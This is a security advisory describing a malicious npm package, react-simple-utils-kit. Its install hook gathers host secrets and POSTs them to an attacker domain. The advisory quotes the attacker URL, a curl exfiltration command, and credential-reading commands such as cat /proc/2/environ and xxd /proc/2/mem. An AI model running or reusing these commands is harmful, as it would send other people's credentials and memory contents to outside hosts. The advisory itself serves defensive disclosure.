
MAL-2026-6303

Malicious code in react-simple-utils-kit (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (038aa6bccd8008fec1f309d718e53dd4b89e4ca15a976c6a80652e0dd58a5b58)

Package advertises itself as 'a simple date formatting utility for React projects' (3-function index.js), but ships a postinstall.js that runs on every `npm install` and performs an extensive reconnaissance + credential-harvest sweep against the installer's host, POSTing each result over plain HTTP to a hardcoded attacker endpoint at http://2e3bkumw.requestrepo.com (a one-shot request-interception domain unrelated to any legitimate publisher).

postinstall.js:8 hardcodes `const BURL = 'http://2e3bkumw.requestrepo.com'` and postinstall.js:16 invokes ``execSync(`curl -s -m 8 -X POST -d @${tmpFile} ${BURL}/${key}...`)`` to ship results.

Collected data includes: process capabilities and ptrace scope, strace attach against PID 2, raw memory reads of another process via `xxd /proc/2/mem`, that process's environment block via `cat /proc/2/environ` (commonly containing CI tokens and cloud credentials), `/proc/2/cmdline`, `ps aux`, listening-port enumeration, MCP probing on localhost:9000, and raw-disk reads from `/dev/vdb`.

The package's name targets React developers via a date-utility cover story (empty author field, Chinese comment `绕过能力探测` = 'capability-detection bypass'); none of this behavior is consistent with the advertised purpose.

Installer harm is concrete and immediate: any host running `npm install react-simple-utils-kit` leaks process-tree secrets, environment variables of other running processes, kernel/container introspection data, and raw block-device contents to attacker infrastructure.


Affected packages

npm / react-simple-utils-kit

No fixed version published yet for react-simple-utils-kit (npm). Pin to a known-safe version or switch to an alternative.

References